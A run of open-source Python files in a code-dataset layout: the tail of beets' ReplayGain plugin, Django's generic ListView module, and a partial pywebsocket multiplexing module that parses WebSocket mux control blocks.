ret.append(Gain(self._file_tags[item]["TRACK_GAIN"],
self._file_tags[item]["TRACK_PEAK"]))
return ret
def compute_album_gain(self, album):
items = list(album.items())
self.compute(items, True)
if len(self._file_tags) != len(items):
raise ReplayGainError("Some items in album did not receive tags")
ret = []
for item in items:
ret.append(Gain(self._file_tags[item]["TRACK_GAIN"],
self._file_tags[item]["TRACK_PEAK"]))
last_tags = self._file_tags[items[-1]]
return AlbumGain(Gain(last_tags["ALBUM_GAIN"],
last_tags["ALBUM_PEAK"]), ret)
def close(self):
self._bus.remove_signal_watch()
def _on_eos(self, bus, message):
# A file finished playing in all elements of the pipeline. The
# RG tags have already been propagated. If we don't have a next
# file, we stop processing.
if not self._set_next_file():
self._pipe.set_state(self.Gst.State.NULL)
self._main_loop.quit()
def _on_error(self, bus, message):
self._pipe.set_state(self.Gst.State.NULL)
self._main_loop.quit()
err, debug = message.parse_error()
f = self._src.get_property("location")
# A GStreamer error, either an unsupported format or a bug.
self._error = \
ReplayGainError(u"Error {0} - {1} on file {2}".format(err,
debug,
f))
def _on_tag(self, bus, message):
tags = message.parse_tag()
def handle_tag(taglist, tag, userdata):
            # The rganalysis element provides both the existing tags of
            # a file and the newly computed tags. To ensure we store the
            # computed tags, we overwrite the RG values whenever they
            # are received a second time.
if tag == self.Gst.TAG_TRACK_GAIN:
self._file_tags[self._file]["TRACK_GAIN"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_TRACK_PEAK:
self._file_tags[self._file]["TRACK_PEAK"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_ALBUM_GAIN:
self._file_tags[self._file]["ALBUM_GAIN"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_ALBUM_PEAK:
self._file_tags[self._file]["ALBUM_PEAK"] = \
taglist.get_double(tag)[1]
elif tag == self.Gst.TAG_REFERENCE_LEVEL:
self._file_tags[self._file]["REFERENCE_LEVEL"] = \
taglist.get_double(tag)[1]
tags.foreach(handle_tag, None)
def _set_first_file(self):
if len(self._files) == 0:
return False
self._file = self._files.pop(0)
self._pipe.set_state(self.Gst.State.NULL)
self._src.set_property("location", syspath(self._file.path))
self._pipe.set_state(self.Gst.State.PLAYING)
return True
def _set_file(self):
"""Initialize the filesrc element with the next file to be analyzed.
"""
# No more files, we're done
if len(self._files) == 0:
return False
self._file = self._files.pop(0)
# Disconnect the decodebin element from the pipeline, set its
        # state to READY to clear it.
self._decbin.unlink(self._conv)
self._decbin.set_state(self.Gst.State.READY)
# Set a new file on the filesrc element, can only be done in the
# READY state
self._src.set_state(self.Gst.State.READY)
self._src.set_property("location", syspath(self._file.path))
# Ensure the filesrc element received the paused state of the
# pipeline in a blocking manner
self._src.sync_state_with_parent()
self._src.get_state(self.Gst.CLOCK_TIME_NONE)
# Ensure the decodebin element receives the paused state of the
# pipeline in a blocking manner
self._decbin.sync_state_with_parent()
self._decbin.get_state(self.Gst.CLOCK_TIME_NONE)
return True
def _set_next_file(self):
"""Set the next file to be analyzed while keeping the pipeline
in the PAUSED state so that the rganalysis element can correctly
handle album gain.
"""
# A blocking pause
self._pipe.set_state(self.Gst.State.PAUSED)
self._pipe.get_state(self.Gst.CLOCK_TIME_NONE)
# Try setting the next file
ret = self._set_file()
if ret:
# Seek to the beginning in order to clear the EOS state of the
# various elements of the pipeline
self._pipe.seek_simple(self.Gst.Format.TIME,
self.Gst.SeekFlags.FLUSH,
0)
self._pipe.set_state(self.Gst.State.PLAYING)
return ret
def _on_pad_added(self, decbin, pad):
sink_pad = self._conv.get_compatible_pad(pad, None)
assert(sink_pad is not None)
pad.link(sink_pad)
def _on_pad_removed(self, decbin, pad):
# Called when the decodebin element is disconnected from the
# rest of the pipeline while switching input files
peer = pad.get_peer()
assert(peer is None)
class AudioToolsBackend(Backend):
"""ReplayGain backend that uses `Python Audio Tools
<http://audiotools.sourceforge.net/>`_ and its capabilities to read more
    file formats and compute ReplayGain values using its replaygain module.
"""
def __init__(self, config, log):
super(AudioToolsBackend, self).__init__(config, log)
self._import_audiotools()
def _import_audiotools(self):
"""Check whether it's possible to import the necessary modules.
There is no check on the file formats at runtime.
:raises :exc:`ReplayGainError`: if the modules cannot be imported
"""
try:
import audiotools
import audiotools.replaygain
except ImportError:
raise FatalReplayGainError(
"Failed to load audiotools: audiotools not found"
)
self._mod_audiotools = audiotools
self._mod_replaygain = audiotools.replaygain
def open_audio_file(self, item):
"""Open the file to read the PCM stream from the using
``item.path``.
:return: the audiofile instance
:rtype: :class:`audiotools.AudioFile`
:raises :exc:`ReplayGainError`: if the file is not found or the
file format is not supported
"""
try:
audiofile = self._mod_audiotools.open(item.path)
except IOError:
raise ReplayGainError(
"File {} was not found".format(item.path)
)
except self._mod_audiotools.UnsupportedFile:
raise ReplayGainError(
"Unsupported file type {}".format(item.format)
)
return audiofile
def init_replaygain(self, audiofile, item):
"""Return an initialized :class:`audiotools.replaygain.ReplayGain`
instance, which requires the sample rate of the song(s) on which
the ReplayGain values will be computed. The item is passed in case
the sample rate is invalid to log the stored item sample rate.
    :return: initialized replaygain object
:rtype: :class:`audiotools.replaygain.ReplayGain`
:raises: :exc:`ReplayGainError` if the sample rate is invalid
"""
try:
rg = self._mod_replaygain.ReplayGain(audiofile.sample_rate())
except ValueError:
raise ReplayGainError(
"Unsupported sample rate {}".format(item.samplerate)
)
        return rg
def compute_track_gain(self, items):
"""Compute ReplayGain values for the requested items.
:return list: list of :class:`Gain` objects
"""
return [self._compute_track_gain(item) for item in items]
def _title_gain(self, rg, audiofile):
"""Get the gain result pair from PyAudioTools using the `ReplayGain`
instance `rg` for the given `audiofile`.
Wraps `rg.title_gain(audiofile.to_pcm())` and throws a
`ReplayGainError` when the library fails.
"""
try:
# The method needs an audiotools.PCMReader instance that can
# be obtained from an audiofile instance.
return rg.title_gain(audiofile.to_pcm())
except ValueError as exc:
# `audiotools.replaygain` can raise a `ValueError` if the sample
# rate is incorrect.
self._log.debug('error in rg.title_gain() call: {}', exc)
raise ReplayGainError('audiotools audio data error')
def _compute_track_gain(self, item):
"""Compute ReplayGain value for the requested item.
:rtype: :class:`Gain`
"""
audiofile = self.open_audio_file(item)
rg = self.init_replaygain(audiofile, item)
        # Each call to _title_gain with the ReplayGain object returns the
        # gain and peak of the track.
        rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)
self._log.debug(u'ReplayGain for track {0} - {1}: {2:.2f}, {3:.2f}',
item.artist, item.title, rg_track_gain, rg_track_peak)
return Gain(gain=rg_track_gain, peak=rg_track_peak)
def compute_album_gain(self, album):
"""Compute ReplayGain values for the requested album and its items.
:rtype: :class:`AlbumGain`
"""
self._log.debug(u'Analysing album {0}', album)
# The first item is taken and opened to get the sample rate to
# initialize the replaygain object. The object is used for all the
# tracks in the album to get the album values.
item = list(album.items())[0]
audiofile = self.open_audio_file(item)
rg = self.init_replaygain(audiofile, item)
track_gains = []
for item in album.items():
audiofile = self.open_audio_file(item)
rg_track_gain, rg_track_peak = self._title_gain(rg, audiofile)
track_gains.append(
Gain(gain=rg_track_gain, peak=rg_track_peak)
)
self._log.debug(u'ReplayGain for track {0}: {1:.2f}, {2:.2f}',
item, rg_track_gain, rg_track_peak)
# After getting the values for all tracks, it's possible to get the
# album values.
rg_album_gain, rg_album_peak = rg.album_gain()
self._log.debug(u'ReplayGain for album {0}: {1:.2f}, {2:.2f}',
album, rg_album_gain, rg_album_peak)
return AlbumGain(
Gain(gain=rg_album_gain, peak=rg_album_peak),
track_gains=track_gains
)
# Main plugin logic.
class ReplayGainPlugin(BeetsPlugin):
"""Provides ReplayGain analysis.
"""
backends = {
"command": CommandBackend,
"gstreamer": GStreamerBackend,
"audiotools": AudioToolsBackend,
"bs1770gain": Bs1770gainBackend
}
def __init__(self):
super(ReplayGainPlugin, self).__init__()
# default backend is 'command' for backward-compatibility.
self.config.add({
'overwrite': False,
'auto': True,
'backend': u'command',
'targetlevel': 89,
})
self.overwrite = self.config['overwrite'].get(bool)
backend_name = self.config['backend'].get(unicode)
if backend_name not in self.backends:
raise ui.UserError(
u"Selected ReplayGain backend {0} is not supported. "
u"Please select one of: {1}".format(
backend_name,
u', '.join(self.backends.keys())
)
)
# On-import analysis.
if self.config['auto']:
self.import_stages = [self.imported]
try:
self.backend_instance = self.backends[backend_name](
self.config, self._log
)
except (ReplayGainError, FatalReplayGainError) as e:
raise ui.UserError(
'replaygain initialization failed: {0}'.format(e)
)
def track_requires_gain(self, item):
return self.overwrite or \
(not item.rg_track_gain or not item.rg_track_peak)
def album_requires_gain(self, album):
# Skip calculating gain only when *all* files don't need
# recalculation. This way, if any file among an album's tracks
# needs recalculation, we still get an accurate album gain
# value.
return self.overwrite or \
any([not item.rg_album_gain or not item.rg_album_peak
for item in album.items()])
def store_track_gain(self, item, track_gain):
item.rg_track_gain = track_gain.gain
item.rg_track_peak = track_gain.peak
item.store()
self._log.debug(u'applied track gain {0}, peak {1}',
item.rg_track_gain, item.rg_track_peak)
def store_album_gain(self, album, album_gain):
album.rg_album_gain = album_gain.gain
album.rg_album_peak = album_gain.peak
album.store()
self._log.debug(u'applied album gain {0}, peak {1}',
album.rg_album_gain, album.rg_album_peak)
def handle_album(self, album, write):
"""Compute album and track replay gain store it in all of the
album's items.
If ``write`` is truthy then ``item.write()`` is called for each
item. If replay gain information is already present in all
items, nothing is done.
"""
if not self.album_requires_gain(album):
self._log.info(u'Skipping album {0}', album)
return
self._log.info(u'analyzing {0}', album)
try:
album_gain = self.backend_instance.compute_album_gain(album)
if len(album_gain.track_gains) != len(album.items()):
raise ReplayGainError(
u"ReplayGain backend failed "
u"for some tracks in album {0}".format(album)
)
self.store_album_gain(album, album_gain.album_gain)
for item, track_gain in itertools.izip(album.items(),
album_gain.track_gains):
self.store_track_gain(item, track_gain)
if write:
item.try_write()
except ReplayGainError as e:
self._log.info(u"ReplayGain error: {0}", e)
except FatalReplayGainError as e:
raise ui.UserError(
u"Fatal replay gain error: {0}".format(e)
)
def handle_track(self, item, write):
"""Compute track replay gain and store it in the item.
If ``write`` is truthy then ``item.write()`` is called to write
the data to disk. If replay gain information is already present
in the item, nothing is done.
"""
if not self.track_requires_gain(item):
self._log.info(u'Skipping track {0}', item)
return
self._log.info(u'analyzing {0}', item)
try:
track_gains = self.backend_instance.compute_track_gain([item])
if len(track_gains) != 1:
raise ReplayGainError(
u"ReplayGain backend failed for track {0}".format(item)
)
self.store_track_gain(item, track_gains[0])
if write:
item.try_write()
except ReplayGainError as e:
self._log.info(u"ReplayGain error: {0}", e)
except FatalReplayGainError as e:
raise ui.UserError(
u"Fatal replay gain error: {0}".format(e)
)
def imported(self, session, task):
"""Add replay gain info to items or albums of ``task``.
"""
if task.is_album:
self.handle_album(task.album, False)
else:
self.handle_track(task.item, False)
def commands(self):
"""Return the "replaygain" ui subcommand.
"""
def func(lib, opts, args):
self._log.setLevel(logging.INFO)
write = ui.should_write()
if opts.album:
for album in lib.albums(ui.decargs(args)):
self.handle_album(album, write)
else:
for item in lib.items(ui.decargs(args)):
self.handle_track(item, write)
cmd = ui.Subcommand('replaygain', help='analyze for ReplayGain')
cmd.parser.add_album_option()
cmd.func = func
return [cmd]
| mit |
gladsonvm/haystackdemo | lib/python2.7/site-packages/django/views/generic/list.py | 82 | 5852 | from django.core.paginator import Paginator, InvalidPage
from django.core.exceptions import ImproperlyConfigured
from django.http import Http404
from django.utils.encoding import smart_str
from django.utils.translation import ugettext as _
from django.views.generic.base import TemplateResponseMixin, View
class MultipleObjectMixin(object):
allow_empty = True
queryset = None
model = None
paginate_by = None
context_object_name = None
paginator_class = Paginator
def get_queryset(self):
"""
        Get the list of items for this view. This must be an iterable, and may
        be a queryset (in which case queryset-specific behavior will be enabled).
"""
if self.queryset is not None:
queryset = self.queryset
if hasattr(queryset, '_clone'):
queryset = queryset._clone()
elif self.model is not None:
queryset = self.model._default_manager.all()
else:
raise ImproperlyConfigured(u"'%s' must define 'queryset' or 'model'"
% self.__class__.__name__)
return queryset
def paginate_queryset(self, queryset, page_size):
"""
Paginate the queryset, if needed.
"""
paginator = self.get_paginator(queryset, page_size, allow_empty_first_page=self.get_allow_empty())
page = self.kwargs.get('page') or self.request.GET.get('page') or 1
try:
page_number = int(page)
except ValueError:
if page == 'last':
page_number = paginator.num_pages
else:
raise Http404(_(u"Page is not 'last', nor can it be converted to an int."))
try:
page = paginator.page(page_number)
return (paginator, page, page.object_list, page.has_other_pages())
except InvalidPage:
raise Http404(_(u'Invalid page (%(page_number)s)') % {
'page_number': page_number
})
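    # Usage note (illustration, not part of the original module): with
    # 23 objects and page_size 10, ?page=last resolves to page_number
    # 3, and the returned tuple is (paginator, page 3, its 3 objects,
    # True) since other pages exist.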
def get_paginate_by(self, queryset):
"""
Get the number of items to paginate by, or ``None`` for no pagination.
"""
return self.paginate_by
def get_paginator(self, queryset, per_page, orphans=0, allow_empty_first_page=True):
"""
Return an instance of the paginator for this view.
"""
return self.paginator_class(queryset, per_page, orphans=orphans, allow_empty_first_page=allow_empty_first_page)
def get_allow_empty(self):
"""
Returns ``True`` if the view should display empty lists, and ``False``
if a 404 should be raised instead.
"""
return self.allow_empty
def get_context_object_name(self, object_list):
"""
Get the name of the item to be used in the context.
"""
if self.context_object_name:
return self.context_object_name
elif hasattr(object_list, 'model'):
return smart_str('%s_list' % object_list.model._meta.object_name.lower())
else:
return None
def get_context_data(self, **kwargs):
"""
Get the context for this view.
"""
queryset = kwargs.pop('object_list')
page_size = self.get_paginate_by(queryset)
context_object_name = self.get_context_object_name(queryset)
if page_size:
paginator, page, queryset, is_paginated = self.paginate_queryset(queryset, page_size)
context = {
'paginator': paginator,
'page_obj': page,
'is_paginated': is_paginated,
'object_list': queryset
}
else:
context = {
'paginator': None,
'page_obj': None,
'is_paginated': False,
'object_list': queryset
}
context.update(kwargs)
if context_object_name is not None:
context[context_object_name] = queryset
return context
class BaseListView(MultipleObjectMixin, View):
def get(self, request, *args, **kwargs):
self.object_list = self.get_queryset()
allow_empty = self.get_allow_empty()
if not allow_empty and len(self.object_list) == 0:
raise Http404(_(u"Empty list and '%(class_name)s.allow_empty' is False.")
% {'class_name': self.__class__.__name__})
context = self.get_context_data(object_list=self.object_list)
return self.render_to_response(context)
class MultipleObjectTemplateResponseMixin(TemplateResponseMixin):
template_name_suffix = '_list'
def get_template_names(self):
"""
Return a list of template names to be used for the request. Must return
a list. May not be called if get_template is overridden.
"""
try:
names = super(MultipleObjectTemplateResponseMixin, self).get_template_names()
except ImproperlyConfigured:
# If template_name isn't specified, it's not a problem --
# we just start with an empty list.
names = []
# If the list is a queryset, we'll invent a template name based on the
# app and model name. This name gets put at the end of the template
# name list so that user-supplied names override the automatically-
# generated ones.
if hasattr(self.object_list, 'model'):
opts = self.object_list.model._meta
names.append("%s/%s%s.html" % (opts.app_label, opts.object_name.lower(), self.template_name_suffix))
return names
class ListView(MultipleObjectTemplateResponseMixin, BaseListView):
"""
Render some list of objects, set by `self.model` or `self.queryset`.
`self.queryset` can actually be any iterable of items, not just a queryset.
"""
| mit |
hiei23/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/mux.py | 636 | 71218 | # Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides classes and helper functions for multiplexing extension.
Specification:
http://tools.ietf.org/html/draft-ietf-hybi-websocket-multiplexing-06
"""
import collections
import copy
import email
import email.parser
import logging
import math
import struct
import threading
import traceback
from mod_pywebsocket import common
from mod_pywebsocket import handshake
from mod_pywebsocket import util
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_hybi import Frame
from mod_pywebsocket._stream_hybi import Stream
from mod_pywebsocket._stream_hybi import StreamOptions
from mod_pywebsocket._stream_hybi import create_binary_frame
from mod_pywebsocket._stream_hybi import create_closing_handshake_body
from mod_pywebsocket._stream_hybi import create_header
from mod_pywebsocket._stream_hybi import create_length_header
from mod_pywebsocket._stream_hybi import parse_frame
from mod_pywebsocket.handshake import hybi
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
_MAX_CHANNEL_ID = 2 ** 29 - 1
_INITIAL_NUMBER_OF_CHANNEL_SLOTS = 64
_INITIAL_QUOTA_FOR_CLIENT = 8 * 1024
_HANDSHAKE_ENCODING_IDENTITY = 0
_HANDSHAKE_ENCODING_DELTA = 1
# We need only these status code for now.
_HTTP_BAD_RESPONSE_MESSAGES = {
common.HTTP_STATUS_BAD_REQUEST: 'Bad Request',
}
# DropChannel reason code
# TODO(bashi): Define all reason code defined in -05 draft.
_DROP_CODE_NORMAL_CLOSURE = 1000
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE = 2001
_DROP_CODE_CHANNEL_ID_TRUNCATED = 2002
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED = 2003
_DROP_CODE_UNKNOWN_MUX_OPCODE = 2004
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK = 2005
_DROP_CODE_CHANNEL_ALREADY_EXISTS = 2006
_DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION = 2007
_DROP_CODE_UNKNOWN_REQUEST_ENCODING = 2010
_DROP_CODE_SEND_QUOTA_VIOLATION = 3005
_DROP_CODE_SEND_QUOTA_OVERFLOW = 3006
_DROP_CODE_ACKNOWLEDGED = 3008
_DROP_CODE_BAD_FRAGMENTATION = 3009
class MuxUnexpectedException(Exception):
"""Exception in handling multiplexing extension."""
pass
# Temporary
class MuxNotImplementedException(Exception):
"""Raised when a flow enters unimplemented code path."""
pass
class LogicalConnectionClosedException(Exception):
"""Raised when logical connection is gracefully closed."""
pass
class PhysicalConnectionError(Exception):
"""Raised when there is a physical connection error."""
def __init__(self, drop_code, message=''):
super(PhysicalConnectionError, self).__init__(
'code=%d, message=%r' % (drop_code, message))
self.drop_code = drop_code
self.message = message
class LogicalChannelError(Exception):
"""Raised when there is a logical channel error."""
def __init__(self, channel_id, drop_code, message=''):
super(LogicalChannelError, self).__init__(
'channel_id=%d, code=%d, message=%r' % (
channel_id, drop_code, message))
self.channel_id = channel_id
self.drop_code = drop_code
self.message = message
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
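# Illustration (added for exposition, not part of the original
# module): ids below 2**7 encode in one byte, below 2**14 in two,
# below 2**21 in three, and below 2**29 in four.
#
#     assert _encode_channel_id(5) == chr(5)
#     assert _encode_channel_id(300) == struct.pack('!H', 0x8000 + 300)
#     assert len(_encode_channel_id(2 ** 20)) == 3
#     assert len(_encode_channel_id(2 ** 28)) == 4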
def _encode_number(number):
return create_length_header(number, False)
def _create_add_channel_response(channel_id, encoded_handshake,
encoding=0, rejected=False):
if encoding != 0 and encoding != 1:
raise ValueError('Invalid encoding %d' % encoding)
first_byte = ((_MUX_OPCODE_ADD_CHANNEL_RESPONSE << 5) |
(rejected << 4) | encoding)
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(len(encoded_handshake)) +
encoded_handshake)
return block
def _create_drop_channel(channel_id, code=None, message=''):
if len(message) > 0 and code is None:
raise ValueError('Code must be specified if message is specified')
first_byte = _MUX_OPCODE_DROP_CHANNEL << 5
block = chr(first_byte) + _encode_channel_id(channel_id)
if code is None:
block += _encode_number(0) # Reason size
else:
reason = struct.pack('!H', code) + message
reason_size = _encode_number(len(reason))
block += reason_size + reason
return block
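# Illustration (added for exposition): a DropChannel block for channel
# 1 with code 1000 and message 'bye' is one opcode byte, a one-byte
# channel id, a one-byte reason size (5), then the 2-byte code and the
# 3-byte message.
#
#     block = _create_drop_channel(1, code=1000, message='bye')
#     assert ord(block[0]) == _MUX_OPCODE_DROP_CHANNEL << 5
#     assert len(block) == 8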
def _create_flow_control(channel_id, replenished_quota):
first_byte = _MUX_OPCODE_FLOW_CONTROL << 5
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(replenished_quota))
return block
def _create_new_channel_slot(slots, send_quota):
if slots < 0 or send_quota < 0:
raise ValueError('slots and send_quota must be non-negative.')
first_byte = _MUX_OPCODE_NEW_CHANNEL_SLOT << 5
block = (chr(first_byte) +
_encode_number(slots) +
_encode_number(send_quota))
return block
def _create_fallback_new_channel_slot():
first_byte = (_MUX_OPCODE_NEW_CHANNEL_SLOT << 5) | 1 # Set the F flag
block = (chr(first_byte) + _encode_number(0) + _encode_number(0))
return block
def _parse_request_text(request_text):
request_line, header_lines = request_text.split('\r\n', 1)
words = request_line.split(' ')
if len(words) != 3:
raise ValueError('Bad Request-Line syntax %r' % request_line)
[command, path, version] = words
if version != 'HTTP/1.1':
raise ValueError('Bad request version %r' % version)
# email.parser.Parser() parses RFC 2822 (RFC 822) style headers.
# RFC 6455 refers RFC 2616 for handshake parsing, and RFC 2616 refers
# RFC 822.
headers = email.parser.Parser().parsestr(header_lines)
return command, path, version, headers
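# Illustration (added for exposition, not part of the original
# module):
#
#     command, path, version, headers = _parse_request_text(
#         'GET /chat HTTP/1.1\r\nHost: server.example.com\r\n\r\n')
#     assert (command, path, version) == ('GET', '/chat', 'HTTP/1.1')
#     assert headers['Host'] == 'server.example.com'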
class _ControlBlock(object):
"""A structure that holds parsing result of multiplexing control block.
Control block specific attributes will be added by _MuxFramePayloadParser.
(e.g. encoded_handshake will be added for AddChannelRequest and
AddChannelResponse)
"""
def __init__(self, opcode):
self.opcode = opcode
class _MuxFramePayloadParser(object):
"""A class that parses multiplexed frame payload."""
def __init__(self, payload):
self._data = payload
self._read_position = 0
self._logger = util.get_class_logger(self)
def read_channel_id(self):
"""Reads channel id.
Raises:
ValueError: when the payload doesn't contain
valid channel id.
"""
remaining_length = len(self._data) - self._read_position
pos = self._read_position
if remaining_length == 0:
raise ValueError('Invalid channel id format')
channel_id = ord(self._data[pos])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining_length < 4:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!L',
self._data[pos:pos+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining_length < 3:
raise ValueError('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', self._data[pos+1:pos+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining_length < 2:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!H',
self._data[pos:pos+2])[0] & 0x3fff
channel_id_length = 2
self._read_position += channel_id_length
return channel_id
def read_inner_frame(self):
"""Reads an inner frame.
Raises:
PhysicalConnectionError: when the inner frame is invalid.
"""
if len(self._data) == self._read_position:
raise PhysicalConnectionError(
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED)
bits = ord(self._data[self._read_position])
self._read_position += 1
fin = (bits & 0x80) == 0x80
rsv1 = (bits & 0x40) == 0x40
rsv2 = (bits & 0x20) == 0x20
rsv3 = (bits & 0x10) == 0x10
opcode = bits & 0xf
payload = self.remaining_data()
# Consume rest of the message which is payload data of the original
# frame.
self._read_position = len(self._data)
return fin, rsv1, rsv2, rsv3, opcode, payload
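    # Bit layout of the leading byte read above, mirroring RFC 6455
    # framing: FIN(1) RSV1(1) RSV2(1) RSV3(1) OPCODE(4). For example,
    # 0x81 decodes as a final, unfragmented text frame (fin=True,
    # opcode=0x1).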
def _read_number(self):
if self._read_position + 1 > len(self._data):
raise ValueError(
'Cannot read the first byte of number field')
number = ord(self._data[self._read_position])
if number & 0x80 == 0x80:
raise ValueError(
'The most significant bit of the first byte of number should '
'be unset')
self._read_position += 1
pos = self._read_position
if number == 127:
if pos + 8 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 8
number = struct.unpack('!Q', self._data[pos:pos+8])[0]
if number > 0x7FFFFFFFFFFFFFFF:
raise ValueError('Encoded number(%d) >= 2^63' % number)
if number <= 0xFFFF:
raise ValueError(
'%d should not be encoded by 9 bytes encoding' % number)
return number
if number == 126:
if pos + 2 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 2
number = struct.unpack('!H', self._data[pos:pos+2])[0]
if number <= 125:
raise ValueError(
'%d should not be encoded by 3 bytes encoding' % number)
            return number
        return number
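    # Decoding mirrors the WebSocket payload-length scheme (note added
    # for exposition): a first byte of 0..125 is the value itself, 126
    # prefixes a 2-byte value, 127 an 8-byte value, and longer-than-
    # necessary encodings are rejected above. For example:
    #
    #     p = _MuxFramePayloadParser(chr(126) + struct.pack('!H', 300))
    #     assert p._read_number() == 300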
def _read_size_and_contents(self):
"""Reads data that consists of followings:
- the size of the contents encoded the same way as payload length
of the WebSocket Protocol with 1 bit padding at the head.
- the contents.
"""
try:
size = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
pos = self._read_position
if pos + size > len(self._data):
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Cannot read %d bytes data' % size)
self._read_position += size
return self._data[pos:pos+size]
def _read_add_channel_request(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x7
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
# Invalid encoding will be handled by MuxHandler.
encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoding = encoding
encoded_handshake = self._read_size_and_contents()
control_block.encoded_handshake = encoded_handshake
return control_block
def _read_add_channel_response(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x3
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.accepted = (first_byte >> 4) & 1
control_block.encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoded_handshake = self._read_size_and_contents()
return control_block
def _read_flow_control(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def _read_drop_channel(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
reason = self._read_size_and_contents()
if len(reason) == 0:
control_block.drop_code = None
control_block.drop_message = ''
elif len(reason) >= 2:
control_block.drop_code = struct.unpack('!H', reason[:2])[0]
control_block.drop_message = reason[2:]
else:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
                'Received DropChannel that contains only a 1-byte reason')
return control_block
def _read_new_channel_slot(self, first_byte, control_block):
reserved = first_byte & 0x1e
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.fallback = first_byte & 1
try:
control_block.slots = self._read_number()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
